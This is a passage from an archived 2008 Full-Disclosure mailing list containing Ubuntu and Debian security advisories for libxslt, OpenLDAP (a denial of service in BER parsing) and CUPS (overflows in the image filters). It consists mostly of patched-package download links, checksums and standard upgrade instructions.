http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1-dbg_1.1.22-1ubuntu1.2_sparc.deb Size/MD5: 332666 79c598e359898b6883f0e1ec9e204935 http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1-dev_1.1.22-1ubuntu1.2_sparc.deb Size/MD5: 610368 242f7909eeab411d95bc1dda5f10488d http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1.1_1.1.22-1ubuntu1.2_sparc.deb Size/MD5: 222038 089b07bd91adb2237ccd756a64145dbc http://ports.ubuntu.com/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.22-1ubuntu1.2_sparc.deb Size/MD5: 255742 7dd2874192921154eaeafa98d4fdf0e0 http://ports.ubuntu.com/pool/main/libx/libxslt/python-libxslt1_1.1.22-1ubuntu1.2_sparc.deb Size/MD5: 155216 aaf79ab34eee2474c4782d376cd7e89d http://ports.ubuntu.com/pool/main/libx/libxslt/xsltproc_1.1.22-1ubuntu1.2_sparc.deb Size/MD5: 110174 e5b3782796aae108117c51690d5dc94d -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 227 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080801/317cfb3f/attachment.bin From kees at ubuntu.com Fri Aug 1 16:27:01 2008 From: kees at ubuntu.com (Kees Cook) Date: Fri, 1 Aug 2008 08:27:01 -0700 Subject: [Full-disclosure] [USN-634-1] OpenLDAP vulnerability Message-ID: <20080801152701.GF21348@outflux.net> =========================================================== Ubuntu Security Notice USN-634-1 August 01, 2008 openldap2.2, openldap2.3 vulnerability CVE-2008-2952 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: slapd 2.2.26-5ubuntu2.8 Ubuntu 7.04: slapd 2.3.30-2ubuntu0.3 Ubuntu 7.10: slapd 2.3.35-1ubuntu0.3 Ubuntu 8.04 LTS: slapd 2.4.9-0ubuntu0.8.04.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Cameron Hotchkies discovered that OpenLDAP did not correctly handle certain ASN.1 BER data. A remote attacker could send a specially crafted packet and crash slapd, leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu2.8.diff.gz Size/MD5: 514393 4f9e265da3b3862538e819f77e2e3586 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu2.8.dsc Size/MD5: 1058 b22c78f0d48cc36e948b54e3af20edfd http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26.orig.tar.gz Size/MD5: 2626629 afc8700b5738da863b30208e1d3e9de8 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.8_amd64.deb Size/MD5: 130764 97be6915cd08b18f1cebd0278fdb6cbd http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.8_amd64.deb Size/MD5: 166234 f033393ec3c64058c9a330f3ff8f3ffd http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.8_amd64.deb Size/MD5: 961898 d2a6a9b40ae45ee16f07081caf554e1f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.8_i386.deb Size/MD5: 118560 6e725d3528b0fbf7603ffaca188fd058 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.8_i386.deb Size/MD5: 146330 c385cbad49d21de849f6deb69a3f24df http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.8_i386.deb Size/MD5: 873280 e2c56f6d1a5a372b90c416d4270a9136 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.8_powerpc.deb Size/MD5: 132924 3f6561c503b4aba5bdd7380ca16a9233 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.8_powerpc.deb Size/MD5: 157382 6b375c5e1da604ff063770a1bacdf9ae http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.8_powerpc.deb Size/MD5: 959922 18f40de968f784c06595986dc90ac2ba sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.8_sparc.deb Size/MD5: 120868 e36bb816e65f673852040cbdc9e99fb8 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.8_sparc.deb Size/MD5: 148406 5ee83d9e8ab2b6a7e43d4486ef4495fd http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.8_sparc.deb Size/MD5: 903834 7fd3a71e6dfdfd629d15f1484eface61 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.30-2ubuntu0.3.diff.gz Size/MD5: 139053 aaea5b917bae9e40a49389eb18ee6b0b http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.30-2ubuntu0.3.dsc Size/MD5: 1333 4bf113a4b679696671b740e0602c0d0c http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.30.orig.tar.gz Size/MD5: 2971126 c40bcc23fa65908b8d7a86a4a6061251 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.3_amd64.deb Size/MD5: 187762 3daa694023d35e8d1d5906531f77184e http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.3_amd64.deb Size/MD5: 292432 5e91f231274471465056dab7ac915579 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.3_amd64.deb Size/MD5: 1228150 2f5c3cff26ded73113db5c3ae9da2c81 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.3_i386.deb Size/MD5: 156182 d70e186bfda981a71eee3c23b97c92c8 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.3_i386.deb Size/MD5: 267618 9d188f962935c72538564fe57dded98f http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.3_i386.deb Size/MD5: 1154914 83d7c5c110c5341d3d611dc9fad7cd47 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.3_powerpc.deb Size/MD5: 203784 f2bc7da688b35227c7f3f8fa171fc504 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.3_powerpc.deb Size/MD5: 294528 e22c51734656e016714aa23ac0822257 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.3_powerpc.deb Size/MD5: 1280558 b6ada4c71ffb98a27638af78f2aa945f sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.3_sparc.deb Size/MD5: 164516 441e58de64bed972d60fbba28e855d7b http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.3_sparc.deb Size/MD5: 264402 1f166e5072bfcf4059caf05e783e5fb4 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.3_sparc.deb Size/MD5: 1170022 c140469dc080ee8278d3ecdc235831d6 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.35-1ubuntu0.3.diff.gz Size/MD5: 151991 51ff8eebcede1f6fad3e31a2614e79d5 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.35-1ubuntu0.3.dsc Size/MD5: 1343 9b21ec600b40a024bb1f7de69a9e95fb http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.35.orig.tar.gz Size/MD5: 2947629 5096146b7a7eb6ce3b0a97549347b5be amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.3_amd64.deb Size/MD5: 190088 5325d5369407eb873c98ee7f41615fde http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.3_amd64.deb Size/MD5: 347238 74514bf63a843d67b3d0910e75709490 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.3_amd64.deb Size/MD5: 1296502 6a572fccaab720d0e48c047e622dbb54 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.3_i386.deb Size/MD5: 155520 59776c8fa4c5860f7f6156d8b4914c5f http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.3_i386.deb Size/MD5: 314742 28a30e5baa754d2ae38af9b4ffbce9de http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.3_i386.deb Size/MD5: 1216458 2c90d198d1d43e88d7588abe53293c71 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.3_lpia.deb Size/MD5: 154744 8ad5d3c9c3560d8fea8fae38d8d75767 http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.3_lpia.deb Size/MD5: 307278 18d45b49ce6400456015193e6cf600fb http://ports.ubuntu.com/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.3_lpia.deb Size/MD5: 1211812 783b0db2a54143566988d54cf1a4dcbe powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.3_powerpc.deb Size/MD5: 205302 c623bf368b4109c62e90e373b9afe23f http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.3_powerpc.deb Size/MD5: 345962 f8c94186487abe14abd758cb55fec8b1 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.3_powerpc.deb Size/MD5: 1345648 cd8ea44a87c657b0ee27e182ff60fba2 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.3_sparc.deb Size/MD5: 166528 8bece260d735957a9aae4974419a8e46 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.3_sparc.deb Size/MD5: 306968 e7cdab9c3df1f7356132f47715e922ed http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.3_sparc.deb Size/MD5: 1229088 f513afe9b2301f2d6832b1ab1c890581 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.4.9-0ubuntu0.8.04.1.diff.gz Size/MD5: 144671 58f945638d8a393778cb4df222717edb http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.4.9-0ubuntu0.8.04.1.dsc Size/MD5: 1547 c6a52c38b25a2f9d5c601c16f178a049 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.4.9.orig.tar.gz Size/MD5: 3694611 3c0b5ae3d45f5675e67aaf81ce7decc9 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.4.9-0ubuntu0.8.04.1_amd64.deb Size/MD5: 266934 6e5418f9691e9d706dca198030a16cbe http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.4-2-dbg_2.4.9-0ubuntu0.8.04.1_amd64.deb Size/MD5: 292184 86aa494fc2b80820183d32b044d16b5f http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.4-2_2.4.9-0ubuntu0.8.04.1_amd64.deb Size/MD5: 197958 090e06973eba26a1cff8e60a7f42a16c http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap2-dev_2.4.9-0ubuntu0.8.04.1_amd64.deb Size/MD5: 868394 a5d7acae075d2c0826e0413272d018ad http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd-dbg_2.4.9-0ubuntu0.8.04.1_amd64.deb Size/MD5: 3614964 3c49f3a956ad5db0ccf792d9b8d36dd1 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.4.9-0ubuntu0.8.04.1_amd64.deb Size/MD5: 1448036 808090c707d68dc9d9901a1c980b3f21 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.4.9-0ubuntu0.8.04.1_i386.deb Size/MD5: 245424 9219d82631dbe22fa6145206cbe85a98 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.4-2-dbg_2.4.9-0ubuntu0.8.04.1_i386.deb Size/MD5: 282694 39a3b506f3ee6d8c097dd7d56dcadec3 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.4-2_2.4.9-0ubuntu0.8.04.1_i386.deb Size/MD5: 182138 cfc345ff59b93219e75ab3eb90b959e7 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap2-dev_2.4.9-0ubuntu0.8.04.1_i386.deb Size/MD5: 777646 4ce598932a7b6e36fee72664d31b77d3 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd-dbg_2.4.9-0ubuntu0.8.04.1_i386.deb Size/MD5: 3533272 002c831a1311521e015324200bb25c88 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.4.9-0ubuntu0.8.04.1_i386.deb Size/MD5: 1354600 ebfd92f0ebc07663e5bdad585efe8259 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/o/openldap2.3/ldap-utils_2.4.9-0ubuntu0.8.04.1_lpia.deb Size/MD5: 246620 c573b1d987fd0b0f1d6e78b3fdd55e2d http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap-2.4-2-dbg_2.4.9-0ubuntu0.8.04.1_lpia.deb Size/MD5: 285252 21e10a90681897f42e73c2d75891a829 http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap-2.4-2_2.4.9-0ubuntu0.8.04.1_lpia.deb Size/MD5: 177840 beaddaca16ab416eb8b7213c8f7f21db http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap2-dev_2.4.9-0ubuntu0.8.04.1_lpia.deb Size/MD5: 779066 8ad40229d8403ab67b89fffa5a5838d4 http://ports.ubuntu.com/pool/main/o/openldap2.3/slapd-dbg_2.4.9-0ubuntu0.8.04.1_lpia.deb Size/MD5: 3565372 471469186a53293b1ca37ae98214182d http://ports.ubuntu.com/pool/main/o/openldap2.3/slapd_2.4.9-0ubuntu0.8.04.1_lpia.deb Size/MD5: 1348534 7db3b6e67624f788898871bcdf4748ed powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/o/openldap2.3/ldap-utils_2.4.9-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 286564 9fdfd981184b736acf1ce3f23546fa8d http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap-2.4-2-dbg_2.4.9-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 288262 2b41a700b9c68003a64552d5878db89e http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap-2.4-2_2.4.9-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 192710 6f49c29d5c5a0d9057bceb5e3ae56096 http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap2-dev_2.4.9-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 897520 ec87b7bb590ea7960f11d40820c10c4e http://ports.ubuntu.com/pool/main/o/openldap2.3/slapd-dbg_2.4.9-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 3670418 eba5c8dae9d82d03e92dbc84580f06a2 http://ports.ubuntu.com/pool/main/o/openldap2.3/slapd_2.4.9-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 1494264 8f0cf97e665d58b769f83d542c56acf4 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/o/openldap2.3/ldap-utils_2.4.9-0ubuntu0.8.04.1_sparc.deb Size/MD5: 248502 d4fbd44307a9920c36d2a6f9df7c1bcf http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap-2.4-2-dbg_2.4.9-0ubuntu0.8.04.1_sparc.deb Size/MD5: 259242 a6743c6dd9c4409a13081c5ee035ddfd http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap-2.4-2_2.4.9-0ubuntu0.8.04.1_sparc.deb Size/MD5: 178744 c92678408505baa4a7746140905a66b7 http://ports.ubuntu.com/pool/main/o/openldap2.3/libldap2-dev_2.4.9-0ubuntu0.8.04.1_sparc.deb Size/MD5: 767462 b9432320d29b5c5d1eb6b1e7541561c8 http://ports.ubuntu.com/pool/main/o/openldap2.3/slapd-dbg_2.4.9-0ubuntu0.8.04.1_sparc.deb Size/MD5: 3484818 ff70b240ab888a27628e3b3c3812e335 http://ports.ubuntu.com/pool/main/o/openldap2.3/slapd_2.4.9-0ubuntu0.8.04.1_sparc.deb Size/MD5: 1349498 66253c6ffd2cb831c24b9713c3edcc87 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 227 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080801/d8e8e513/attachment.bin From thijs at debian.org Fri Aug 1 08:52:06 2008 From: thijs at debian.org (Thijs Kinkhorst) Date: Fri, 1 Aug 2008 09:52:06 +0200 (CEST) Subject: [Full-disclosure] [SECURITY] [DSA 1625-1] New cupsys packages fix arbitrary code execution Message-ID: <20080801075206.95B8C326EFC@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1625-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst August 01, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : cupsys Vulnerability : buffer overflows Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-0053 CVE-2008-1373 CVE-2008-1722 Debian Bug : 476305 Several remote vulnerabilities have been discovered in the Common Unix Printing System (CUPS). The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-0053 Buffer overflows in the HP-GL input filter allowed to possibly run arbitrary code through crafted HP-GL files. CVE-2008-1373 Buffer overflow in the GIF filter allowed to possibly run arbitrary code through crafted GIF files. CVE-2008-1722 Integer overflows in the PNG filter allowed to possibly run arbitrary code through crafted PNG files. For the stable distribution (etch), these problems have been fixed in version 1.2.7-4etch4 of package cupsys. For the testing (lenny) and unstable distribution (sid), these problems have been fixed in version 1.3.7-2 of package cups. We recommend that you upgrade your cupsys package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz Size/MD5 checksum: 4214272 c9ba33356e5bb93efbcf77b6e142e498 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4.diff.gz Size/MD5 checksum: 107641 b1ae0953050580975ef0c6ff495e912d http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4.dsc Size/MD5 checksum: 1376 4f8938f4dac4a9732efd621f4aabb63a Architecture independent packages: http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4etch4_all.deb Size/MD5 checksum: 45758 fbb5c3eaf74a1207d887e12bb75f6182 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4etch4_all.deb Size/MD5 checksum: 924012 43e775475535e31f2f6963947c03525d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 1087542 cb6a29323e4cd1069b669c89963a1fac http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 53024 090d638da135798424a129257b51b157 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 142544 0d446b8acb588ec2b1c8c22067aa2364 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 1574904 cdd7afb0953a56cf8d213778cbe1773e http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 80706 687de2f8bf779ca898863fb94a07a12b http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 85968 8d69f2ac63f2d4fbd923c2caa33c604d http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 36352 02c24a715c2f06dd8bc62a851591948e http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_amd64.deb Size/MD5 checksum: 162230 0e2325c67bf23841038be68557ba8758 arm architecture (ARM) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_arm.deb Size/MD5 checksum: 48718 28a8ac4acad82bd582358e38c0c23013 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_arm.deb Size/MD5 checksum: 78910 6566d320a557b02cf94f379b84f0dba9 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_arm.deb Size/MD5 checksum: 35936 6ae06d35d6c40084adfd8bfd65866174 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_arm.deb Size/MD5 checksum: 1025732 5c3e851e94f3a41216d7a7149839c8d4 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_arm.deb Size/MD5 checksum: 132040 3eb0b900c59ea118d768b1459898ea90 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_arm.deb Size/MD5 checksum: 154878 02d749b77969111a813a4cba408bd74d http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_arm.deb Size/MD5 checksum: 1568968 5c60803b01b551503017f750bea5526e http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_arm.deb Size/MD5 checksum: 85168 5b2a0162f00efdcc8cd1d93e0bc7486b hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 172120 3b9de8875c9be02866143463b0c919f0 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 91152 ab272c582600f995706b46709c510f32 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 1022644 b587ee12458f80bd76a1d7b84869b741 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 57192 4e117dab53e958404f958b99b08da4c1 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 154086 2a27882b763ce10df0fd172cfa8d22bb http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 86898 aebbadb4ddb70dde9a524fd56b7bfb46 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 1624440 67216c81ae5f4d2f1d8b571f7099492e http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_hppa.deb Size/MD5 checksum: 39270 1bbd6351cb6cd5f686faaddbeb731c4f i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_i386.deb Size/MD5 checksum: 86844 5dd05c3c3f08b1e2a60405bcaef83146 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_i386.deb Size/MD5 checksum: 79334 2002dc686f12bb5250d9fafb9b63a268 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_i386.deb Size/MD5 checksum: 53272 1723eb6d5f00ce02702b52b60610c586 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_i386.deb Size/MD5 checksum: 36230 cda0348c0c9b6dbd145e3c02e0c44fd2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_i386.deb Size/MD5 checksum: 1004104 10a43e1b53f782d065362e92ff0998f9 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_i386.deb Size/MD5 checksum: 137972 203602cf657f98ee38a372c3922b7ae1 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_i386.deb Size/MD5 checksum: 160382 2fa7444168c9f43a22eb776bd9638827 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_i386.deb Size/MD5 checksum: 1559230 dfca65e3edd6f0fb4bdc18973efef89a ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 203930 b457e7ae7fb11f876225150e559a4272 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 46330 922f2bd1d98fcbb40badcebd7c0cc07c http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 106642 b61d48e93e413245d3fd5ebe47c31243 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 1107892 65945b9397a13a31fb8646cb71ef7794 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 192372 eea62b30397305acdf6f98a6df50cf8e http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 1770682 398872427b493f8206c38a3504fc1904 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 74158 e1f00e7e8be7549ac2b58adaeba0f5b2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_ia64.deb Size/MD5 checksum: 106226 fb838547edf473df7efaa8fe41cf42f1 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_mips.deb Size/MD5 checksum: 86546 02bd3a3bb274f21179f65edfb28c1f7e http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_mips.deb Size/MD5 checksum: 76158 53a90a54e6cf7418b81e0b40db39566b http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_mips.deb Size/MD5 checksum: 36116 8d78c13d605160ee0caa835961667913 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_mips.deb Size/MD5 checksum: 150982 b48a8bcf9dbff3e842f83f4ca05e0421 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_mips.deb Size/MD5 checksum: 1097820 db2ff50e5555b022b54252f07b442992 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_mips.deb Size/MD5 checksum: 157742 94a7c2d49b7234c0a54291446c5ba06d http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_mips.deb Size/MD5 checksum: 1567460 dffd05c006a78e53bc8c03dc8beaa4ea http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_mips.deb Size/MD5 checksum: 57688 cbce6e984252bef94c0bd7ace9afdcdf mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 86688 